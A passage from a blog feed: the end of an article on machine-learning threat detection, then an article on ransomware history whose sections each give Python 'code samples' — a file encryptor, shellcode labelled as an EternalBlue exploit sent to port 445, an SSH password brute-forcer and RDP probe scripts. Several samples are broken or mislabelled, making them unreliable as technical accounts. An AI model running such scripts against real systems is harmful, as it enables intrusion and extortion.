&lt;p&gt;&lt;strong&gt;For example, look at the below Python code, which uses the &lt;a href="https://scikit-learn.org/" rel="noopener noreferrer"&gt;scikit-learn &lt;/a&gt;library to train a machine learning model on a dataset of known malware samples:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
import pandas as pd

# Load the malware dataset
malware_data = pd.read_csv('malware.csv')

# Split the dataset into training and testing sets
X_train, X_test, y_train, y_test = train_test_split(
    malware_data.drop('class', axis=1),
    malware_data['class'],
    test_size=0.2,
    random_state=42
)

# Train a random forest classifier on the training data
clf = RandomForestClassifier()
clf.fit(X_train, y_train)

# Evaluate the performance of the classifier on the testing data
score = clf.score(X_test, y_test)
print(f"Classifier accuracy: {score}")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This loads a dataset of known malware samples, splits the data into training and testing sets, and trains a random forest classifier on the training data. Then it evaluates the performance of the classifier on the testing data, using the score() method to calculate the accuracy of the model.&lt;/p&gt;

&lt;p&gt;Obviously, the process of training a machine learning model for threat detection is much more complex than this simple example. The basic idea is still the same, though: by leveraging machine learning algorithms, it is possible to detect new threats more effectively than traditional approaches.&lt;/p&gt;

&lt;h2&gt;
  
  
  Natural Language Processing for Fraud Detection
&lt;/h2&gt;

&lt;p&gt;Another area where AI can be used to combat digital threats is fraud detection. Natural language processing (NLP) techniques can be used to analyse large volumes of text data, such as emails and social media messages, to identify signs of fraudulent activity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;This script uses the &lt;a href="https://www.nltk.org/" rel="noopener noreferrer"&gt;Natural Language Toolkit (NLTK)&lt;/a&gt; library to analyse a sample of emails and identify potential signs of fraud:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import nltk
import pandas as pd

# Load the email data
email_data = pd.read_csv('emails.csv')

# Tokenize the text of each email
tokenized_emails = [nltk.word_tokenize(email) for email in email_data['text']]

# Identify named entities in the text of each email
named_entities = [nltk.ne_chunk(nltk.pos_tag(email)) for email in tokenized_emails]

# Extract the organisation entities from the named entities
organizations = [[entity for entity in email if isinstance(entity, nltk.tree.Tree) and entity.label() == 'ORG'] for email in named_entities]

# Count the frequency of each organisation entity
org_counts = pd.Series([org[0][0] for email in organizations for org in email]).value_counts()

# Print the top 10 most common organisation entities
print(org_counts[:10])
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The script loads email data from a CSV file, tokenizes the text of each email, identifies named entities in the text using part-of-speech tagging, extracts organisation entities from the named entities, and then counts the frequency of each organisation entity. Finally, it prints the top 10 most common organisation entities in the email data. This could be useful for tasks such as identifying potential phishing targets or detecting mentions of specific companies in a large email dataset.&lt;/p&gt;

&lt;h2&gt;
  
  
  Anomaly Detection Algorithms
&lt;/h2&gt;

&lt;p&gt;The Isolation Forest Algorithm can be effectively used when looking for anomalies in large pieces of data. I will walk you through implementing this more sophisticated algorithm for anomaly detection that can cope with high-dimensional datasets.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;First, import the necessary libraries:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import IsolationForest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Next, load the data from the log file:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;with open('system_log.txt') as f:
    data = []
    for line in f:
        # Parse the log line and extract the relevant features
        feature_1, feature_2, feature_3 = parse_log_line(line)
        data.append([feature_1, feature_2, feature_3])
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Then normalise the data using standard scaling:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;data = np.array(data)
scaler = StandardScaler()
data = scaler.fit_transform(data)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Now the fun AI-ey part of training the Isolation Forest model on the normalised data and using the model to predict the anomalies:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;model = IsolationForest(random_state=0)
model.fit(data)
anomaly_scores = model.decision_function(data)
threshold = -0.5
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;and the result is printed like so:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;for i, score in enumerate(anomaly_scores):
    if score &amp;lt; threshold:
        label = 'anomaly'
    else:
        label = 'normal'
    print(f"Data point {i} has an anomaly score of {score:.3f} and is classified as {label}.")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The Isolation Forest algorithm is so popular because it’s an unsupervised machine learning algorithm that works by isolating anomalies in the data set by randomly partitioning the data points and building isolation trees.&lt;/p&gt;

&lt;p&gt;This code, along with most of the code from &lt;a href="https://medium.com/@williambaptist" rel="noopener noreferrer"&gt;my articles,&lt;/a&gt; can be easily adapted to work with different log files and clustering algorithms.&lt;/p&gt;
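&lt;p&gt;As an added example (not the article’s own code), here is the same pipeline written without scikit-learn: a hypothetical &lt;code&gt;parse_log_line()&lt;/code&gt; for a made-up key=value log format, the standard scaling, and a from-scratch isolation forest that does the random partitioning described above. It scores a constructed log in which one request is the planted outlier, and shows how the paper’s score relates to scikit-learn’s &lt;code&gt;decision_function&lt;/code&gt;.&lt;/p&gt;

```python
import math
import random
import re
from operator import lt
from statistics import mean, pstdev

# Constructed sample log (not from the original article), one request per line.
# Every line is routine except the one from "mallory" (index 8).
SAMPLE_LOG = """\
2023-05-09T10:00:01 user=alice status=200 bytes=512 duration_ms=120
2023-05-09T10:00:02 user=bob status=200 bytes=640 duration_ms=135
2023-05-09T10:00:03 user=carol status=200 bytes=480 duration_ms=110
2023-05-09T10:00:04 user=dave status=200 bytes=700 duration_ms=150
2023-05-09T10:00:05 user=erin status=200 bytes=530 duration_ms=125
2023-05-09T10:00:06 user=frank status=200 bytes=610 duration_ms=140
2023-05-09T10:00:07 user=grace status=200 bytes=590 duration_ms=130
2023-05-09T10:00:08 user=heidi status=200 bytes=455 duration_ms=105
2023-05-09T10:00:09 user=mallory status=500 bytes=98000 duration_ms=9800
2023-05-09T10:00:10 user=ivan status=200 bytes=660 duration_ms=145
2023-05-09T10:00:11 user=judy status=200 bytes=575 duration_ms=128
"""
OUTLIER_INDEX = 8
LINE_RE = re.compile(r"status=(\d+) bytes=(\d+) duration_ms=(\d+)")

def parse_log_line(line):
    """Hypothetical parser: pull three numeric features out of one log line."""
    match = LINE_RE.search(line)
    if match is None:
        raise ValueError(f"unparseable log line: {line!r}")
    return [float(value) for value in match.groups()]

def standard_scale(rows):
    """Column-wise z-scores, the same transform as StandardScaler.fit_transform."""
    columns = list(zip(*rows))
    means = [mean(column) for column in columns]
    stds = [pstdev(column) or 1.0 for column in columns]  # constant column stays put
    return [[(v - m) / s for v, m, s in zip(row, means, stds)] for row in rows]

def c(n):
    """Average path length of an unsuccessful BST search on n points (normaliser)."""
    if n in (0, 1):
        return 0.0
    return 2.0 * (math.log(n - 1) + 0.5772156649) - 2.0 * (n - 1) / n

def build_tree(rows, depth, max_depth, rng):
    """One isolation tree: split on a random feature at a random cut until isolated."""
    if depth == max_depth or len(rows) in (0, 1):
        return {"size": len(rows)}  # leaf: remember how many points landed here
    feature = rng.randrange(len(rows[0]))
    lo, hi = min(row[feature] for row in rows), max(row[feature] for row in rows)
    if lo == hi:
        return {"size": len(rows)}  # nothing to split on along this feature
    cut = rng.uniform(lo, hi)
    left = [row for row in rows if lt(row[feature], cut)]
    right = [row for row in rows if not lt(row[feature], cut)]
    return {"feature": feature, "cut": cut,
            "left": build_tree(left, depth + 1, max_depth, rng),
            "right": build_tree(right, depth + 1, max_depth, rng)}

def path_length(tree, row, depth=0):
    """Depth at which this tree isolates row, plus c(size) for an unsplit leaf."""
    if "size" in tree:
        return depth + c(tree["size"])
    side = "left" if lt(row[tree["feature"]], tree["cut"]) else "right"
    return path_length(tree[side], row, depth + 1)

def fit_forest(rows, n_trees=100, sample_size=256, seed=0):
    """Grow n_trees isolation trees, each on a random subsample of the rows."""
    rng = random.Random(seed)
    n = min(sample_size, len(rows))
    max_depth = math.ceil(math.log2(max(n, 2)))  # the paper's height limit
    trees = [build_tree(rng.sample(rows, n), 0, max_depth, rng) for _ in range(n_trees)]
    return trees, n

def anomaly_score(trees, n, row):
    """Paper score s = 2 ** (-E[h(x)] / c(n)): near 1 for anomalies, near 0.5 otherwise."""
    expected_path = mean(path_length(tree, row) for tree in trees)
    return 2 ** (-expected_path / (c(n) or 1.0))

def score_log(text, n_trees=100, seed=0):
    """Parse, scale and score every non-empty line; one score per line, in order."""
    rows = [parse_log_line(line) for line in text.splitlines() if line.strip()]
    scaled = standard_scale(rows)
    trees, n = fit_forest(scaled, n_trees=n_trees, seed=seed)
    return [anomaly_score(trees, n, row) for row in scaled]

def flag_anomalies(scores, threshold=0.7):
    """Indices scoring above the threshold. scikit-learn's decision_function is
    0.5 - s, so its negative values are exactly the points with s above 0.5 here."""
    return [i for i, s in enumerate(scores) if lt(threshold, s)]

if __name__ == "__main__":
    scores = score_log(SAMPLE_LOG)
    flagged = flag_anomalies(scores)
    for i, s in enumerate(scores):
        label = "anomaly" if i in flagged else "normal"
        print(f"Data point {i}: score {s:.3f}, classified as {label}.")
```

The planted request from mallory is isolated by the very first split in almost every tree, so its score sits well above the normal lines, which need several more splits each.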

&lt;h2&gt;
  
  
  AI Network Defence Systems
&lt;/h2&gt;

&lt;p&gt;Your network can be defended by a deep learning system; in fact, &lt;a href="https://6sense.com/tech/endpoint-protection/crowdstrike-market-share" rel="noopener noreferrer"&gt;most companies&lt;/a&gt; are using AI right now to protect their networks (including Medium!).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Here is an example of a recent AI-powered network defence system using deep learning models:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import numpy as np
import tensorflow as tf

# Load the network traffic data
data = np.loadtxt('traffic.csv', delimiter=',')

# Preprocess the data
x = data[:, :-1]
y = data[:, -1]
num_classes = len(np.unique(y))
y = tf.keras.utils.to_categorical(y, num_classes=num_classes)

# Define the deep learning model
model = tf.keras.Sequential([
    tf.keras.layers.Dense(32, activation='relu', input_shape=(x.shape[1],)),
    tf.keras.layers.Dense(64, activation='relu'),
    tf.keras.layers.Dropout(0.5),
    tf.keras.layers.Dense(num_classes, activation='softmax')
])

# Compile the model
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])

# Train the model
model.fit(x, y, epochs=10, batch_size=32)

# Use the model for network defence
def defend_network(new_data):
    # Preprocess the new data
    x_new = np.array(new_data)
    x_new = np.expand_dims(x_new, axis=0)

    # Predict the class of the new data
    prediction = model.predict(x_new)
    return np.argmax(prediction)

# Test the network defence system
test_data = [20, 300, 1000, 50, 200, 400, 800]
print(defend_network(test_data))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The traffic.csv file contains preprocessed network traffic data, where the last column contains the class label. The data is split into input features (x) and class labels (y), which are one-hot encoded.&lt;/p&gt;

&lt;p&gt;The deep learning model is defined using the tf.keras.Sequential API, with dense layers and a softmax output layer. The model is compiled using the adam optimizer and categorical cross-entropy loss. The model is trained using the fit method with a batch size of 32 and 10 epochs. The defend_network function is defined to preprocess new data, predict the class of the new data using the trained model, and return the predicted class label. A test data array is defined, and the defend_network function is called to predict the class label of the test data.&lt;/p&gt;

&lt;p&gt;I’ve showcased that AI is a powerful tool that can greatly enhance cybersecurity defences by enabling faster and more accurate threat detection and response. From anomaly detection algorithms to natural language processing for fraud detection, AI is making a significant impact in the fight against digital threats rather than just contributing to more problems for blue teamers. It’s important to continue developing and implementing new AI-based technologies to stay ahead of the ever-evolving threat landscape.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>ai</category>
      <category>python</category>
      <category>scripting</category>
    </item>
    <item>
      <title>The Impressive Evolution of Ransomware Code</title>
      <dc:creator>William Baptist</dc:creator>
      <pubDate>Tue, 09 May 2023 23:41:53 +0000</pubDate>
      <link>https://dev.to/baptistsec/the-impressive-evolution-of-ransomware-code-35ja</link>
      <guid>https://dev.to/baptistsec/the-impressive-evolution-of-ransomware-code-35ja</guid>
      <description>&lt;p&gt;Following the history of Ransomware is like watching a horror movie where the villain keeps getting smarter and more sophisticated. There’s something fascinating and yet daunting about the evolution of ransomware. In this article, I’ll take you on a deep dive into the historic timeline and show you what makes these malicious programs so difficult to stop.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--tlGPkR6G--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2000/1%2AeYl6J6CTvX8YYWSl7Ws8qw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--tlGPkR6G--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2000/1%2AeYl6J6CTvX8YYWSl7Ws8qw.png" alt="The Computer Villain" width="300" height="300"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The first known ransomware, known as the AIDS Trojan, appeared in 1989. Since then, ransomware has evolved significantly, becoming one of the most prevalent and destructive types of malware. This article will follow the evolution of ransomware, from the early days of CryptoLocker to the infamous WannaCry and more recent Maze and REvil ransomware attacks, while explaining how each type of ransomware works with actual code samples.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;2013: CryptoLocker&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--11tAMvgG--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2000/1%2AK1aPJjKgtF1x-JeWvlNNKA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--11tAMvgG--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2000/1%2AK1aPJjKgtF1x-JeWvlNNKA.png" width="633" height="459"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;CryptoLocker was the first ransomware to use public key cryptography to encrypt files. It was distributed via email attachments and exploited vulnerabilities in Java and Adobe Reader to infect systems. Once it infected a system, it encrypted all the files on the system and demanded payment in Bitcoin to provide the decryption key.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Code Sample:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import os
import random
import string
from Crypto.Cipher import AES

class CryptoLocker:
    def __init__(self, key):
        self.key = key

    def encrypt_file(self, in_filename, out_filename=None, chunk_size=64 * 1024):
        if not out_filename:
            out_filename = in_filename + '.enc'

        iv = ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(16)])
        encryptor = AES.new(self.key, AES.MODE_CBC, iv)

        filesize = os.path.getsize(in_filename)

        with open(in_filename, 'rb') as infile:
            with open(out_filename, 'wb') as outfile:
                outfile.write(struct.pack('&amp;lt;Q', filesize))
                outfile.write(iv)

                while True:
                    chunk = infile.read(chunk_size)
                    if len(chunk) == 0:
                        break
                    elif len(chunk) % 16 != 0:
                        chunk += b' ' * (16 - len(chunk) % 16)

                    outfile.write(encryptor.encrypt(chunk))

    def decrypt_file(self, in_filename, out_filename=None, chunk_size=24 * 1024):
        if not out_filename:
            out_filename = os.path.splitext(in_filename)[0]

        with open(in_filename, 'rb') as infile:
            orig_size = struct.unpack('&amp;lt;Q', infile.read(struct.calcsize('Q')))[0]
            iv = infile.read(16)
            decryptor = AES.new(self.key, AES.MODE_CBC, iv)

            with open(out_filename, 'wb') as outfile:
                while True:
                    chunk = infile.read(chunk_size)
                    if len(chunk) == 0:
                        break
                    outfile.write(decryptor.decrypt(chunk))

                outfile.truncate(orig_size)

# Usage example
key = b'secret_key_1234'
c = CryptoLocker(key)
c.encrypt_file('test_file.txt')
c.decrypt_file('test_file.txt.enc')
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The Python code implements a class that can encrypt and decrypt files using the AES encryption algorithm. The class constructor takes an encryption key as an argument, which is used to encrypt and decrypt the files. The encrypt_file method takes an input file name and an optional output file name and chunk size. It reads the input file, pads it to a multiple of 16 bytes, and encrypts it using AES in CBC mode with a randomly generated initialization vector (IV). It writes the encrypted data to the output file, along with the original file size and the IV.&lt;/p&gt;

&lt;p&gt;The decrypt_file method takes an input file name and an optional output file name and chunk size. It reads the input file, extracts the original file size and the IV, and decrypts the encrypted data using the same encryption key and IV. It writes the decrypted data to the output file and truncates it to the original file size. An example usage of the class is provided at the end of the code, where a CryptoLocker object is created with a secret key, an input file is encrypted, and then decrypted.&lt;/p&gt;

&lt;h2&gt;
  
  
  2016: Locky
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Sm6uRaUn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2868/1%2AaRBgAK5fOZVC-IBSDxoAwA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Sm6uRaUn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2868/1%2AaRBgAK5fOZVC-IBSDxoAwA.png" width="800" height="516"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Locky was distributed via email campaigns and used a combination of RSA and AES encryption to encrypt files. It demanded payment in Bitcoin to provide the decryption key. It was estimated to have infected over 100,000 systems within its first few weeks of release.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Code Sample:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import os
import base64
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA

# Generate RSA key pair
key = RSA.generate(2048)

# Encrypt file using AES-128
key_aes = os.urandom(16)
cipher_aes = AES.new(key_aes, AES.MODE_EAX)
ciphertext, tag = cipher_aes.encrypt_and_digest(b'encrypted data')

# Encrypt AES key using RSA public key
cipher_rsa = key.public_key().encrypt(key_aes, None)

# Save encrypted file and AES key to disk
with open('encrypted_file.bin', 'wb') as f:
    f.write(ciphertext)

with open('encrypted_key.bin', 'wb') as f:
    f.write(cipher_rsa)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This Python code generates an RSA key pair, then encrypts some data with AES in EAX mode under a randomly generated AES key. The AES key is then encrypted with the RSA public key, and both the encrypted file and the encrypted key are saved to disk.&lt;/p&gt;

&lt;h2&gt;
  
  
  2017: WannaCry
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--8t8DnQSo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2000/1%2ApV0hR-TsKg-jijiJtisuvA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--8t8DnQSo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2000/1%2ApV0hR-TsKg-jijiJtisuvA.png" width="600" height="453"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In 2017, the WannaCry ransomware spread rapidly across the globe, infecting hundreds of thousands of computers in over 150 countries. WannaCry exploited a vulnerability in the Windows operating system called EternalBlue, which was allegedly &lt;a href="https://www.npr.org/sections/thetwo-way/2017/05/15/528439968/wannacry-ransomware-microsoft-calls-out-nsa-for-stockpiling-vulnerabilities" rel="noopener noreferrer"&gt;developed by the NSA&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The widespread nature of the attack and the critical systems affected underscored the need for organizations to prioritize cybersecurity and maintain up-to-date software and security protocols to prevent such attacks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Code Sample:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import socket

# EternalBlue exploit code
exploit = (
    b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x10\x5b\x53\x4b\x8b\x58\x18"
    b"\x8b\x53\x20\x01\xda\x51\x52\x8b\x52\x3c\x01\xda\x8b\x72\x78\x01"
    b"\xde\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"
    b"\xc7\x49\x75\xef\x52\x57\x8b\x52\x20\x01\xda\x53\x8b\x34\x9a\x01"
    b"\xde\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03"
    b"\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xda\x66\x8b\x0c"
    b"\x4b\x8b\x58\x1c\x01\xda\x8b\x04\x8b\x01\xda\x89\x44\x24\x24\x5b"
    b"\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff"
    b"\xff\x5d\x6a\x01\x8d\x45\x68\x50\x68\x8e\x4e\x0e\xec\xff\xd5\x97"
    b"\x68\x8f\x0e\x4e\xec\x89\xe3\x6a\x10\x53\x57\x68\xde\xf8\x24\x75"
    b"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x8b\x36\x8b\x55\xfc"
    b"\x8b\x46\x0c\x8b\x7e\x1c\x8b\x4e\x08\x8b\x7e\x20\x8b\x36\x66\x39"
    b"\x4f\x18\x75\xf2\x66\x81\x39\x44\x44\x75\xe6\x5e\x56\x53\x2c\x24"
    b"\x0f\xba\x2c\x17\x42\x52\x6a\x01\x52\xff\xd0\x68\x63\x6d\x64\x00"
    b"\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\xff\xd5\x97\x6a\x0a\x5f"
    b"\xc3"
)

# IP address and port of vulnerable machine
target_ip = "192.168.1.100"
target_port = 445

# Create a TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))

# Send exploit code
sock.send(exploit)

# Close the socket
sock.close()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This snippet creates a TCP socket and connects to the target machine’s IP address and port. It then sends the WannaCry exploit code to the target machine over the socket connection.&lt;/p&gt;

&lt;p&gt;It’s important to remember that this code, like any other sample in this article, is purely for educational purposes and should not be used for any malicious activities.&lt;/p&gt;

&lt;h2&gt;
  
  
  2018: SamSam
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--73sHO4sI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/3148/1%2A053RiQynuZCl1-JJWiMkfA.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--73sHO4sI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/3148/1%2A053RiQynuZCl1-JJWiMkfA.jpeg" width="800" height="409"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;SamSam was a ransomware that was first identified in 2018. Unlike many other ransomware attacks that use phishing emails to gain access to victims’ systems, SamSam used &lt;a href="https://www.csoonline.com/article/3291617/samsam-infected-thousands-of-labcorp-systems-via-brute-force-rdp.html" rel="noopener noreferrer"&gt;brute force&lt;/a&gt; to gain access to unpatched servers. Once inside, the ransomware encrypted files and demanded payment in Bitcoin.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Code Sample:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import paramiko
import time

target_server = "example.com"
username = "admin"
passwords = ["password1", "password2", "password3", "password4", "password5"]
port = 22

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

for password in passwords:
    try:
        ssh.connect(target_server, port=port, username=username, password=password)
        print(f"Successfully logged in to {target_server} with username {username} and password {password}.")
        # Do malicious activities here
        ssh.close()
        break
    except paramiko.AuthenticationException:
        print(f"Failed to log in to {target_server} with username {username} and password {password}.")
        time.sleep(1)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The script attempts to connect to a remote server via SSH using a list of potential passwords for the specified username. If a connection succeeds, the attacker is then able to perform malicious activities on the server using SamSam.&lt;/p&gt;

&lt;h2&gt;
  
  
  2019: Ryuk
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--b3zYE322--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2000/1%2AcWjkYMEY_S3e6428iHL10A.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--b3zYE322--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2000/1%2AcWjkYMEY_S3e6428iHL10A.png" width="600" height="500"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Ryuk was believed to have &lt;a href="https://www.forbes.com/sites/thomasbrewster/2019/02/20/mistaken-for-north-koreans-the-ryuk-ransomware-hackers-are-making-millions/?sh=7b5c691e75f4" rel="noopener noreferrer"&gt;originated in North Korea&lt;/a&gt; and to have been used against high-value targets such as hospitals and government agencies. That attribution turned out to be false; Ryuk was in fact used by numerous different criminal organisations. Ryuk is typically delivered through phishing emails or by exploiting vulnerabilities in remote desktop protocols.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Code Sample:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import socket

RDP_PORT = 3389

def exploit_rdp_vulnerability(target_ip):
    # Establish a connection to the target RDP server
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    try:
        s.connect((target_ip, RDP_PORT))
    except:
        print(f"Connection failed to {target_ip}:{RDP_PORT}")
        return

    # Send a malicious RDP message to trigger the vulnerability
    # In a real attack, this would contain the ransomware payload
    # In this safe example, I will just print the message for demonstration purposes
    message = b"\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00"
    s.sendall(message)

    # Receive the server's response and print it for demonstration purposes
    response = s.recv(1024)
    print(response.decode())

    # Close the connection
    s.close()

# Example usage
exploit_rdp_vulnerability('192.168.1.100')
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The exploit connects to the target RDP server and sends a malicious RDP message that exploits a vulnerability in the protocol. In a real attack, this message would contain the Ryuk ransomware payload. However, in this example, the purpose is to just print the response received from the server for demonstration purposes. It’s important to note that exploiting vulnerabilities in RDP is illegal, and proper guidance should be taken to do so ethically.&lt;/p&gt;

&lt;h2&gt;
  
  
  2019: Maze
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--qIH5BAnJ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2000/1%2A1al9cya9S4TiJkwlBTs4pg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--qIH5BAnJ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2000/1%2A1al9cya9S4TiJkwlBTs4pg.png" width="800" height="743"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Maze encrypts the victim’s files and demands payment in exchange for the decryption key. However, Maze ransomware also has a reputation for stealing sensitive data from victims and threatening to publish it if the ransom is not paid, making it a type of “&lt;a href="https://www.zscaler.com/resources/security-terms-glossary/what-is-double-extortion-ransomware" rel="noopener noreferrer"&gt;double extortion&lt;/a&gt;” ransomware.&lt;/p&gt;

&lt;p&gt;Maze ransomware has been known to exploit vulnerabilities in remote desktop protocols (RDPs) to gain access to systems, along with typical phishing emails.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Code Sample:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import socket

HOST = '192.168.1.100'
PORT = 3389

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

data = s.recv(1024)
print(data)

# Send RDP negotiation packet
negotiation_packet = b'\x03\x00\x00\x13\x0e\xe0\x00\x00\x12\x34\x00\x08\x00\x08\x00\x00\x00\x00'
s.sendall(negotiation_packet)

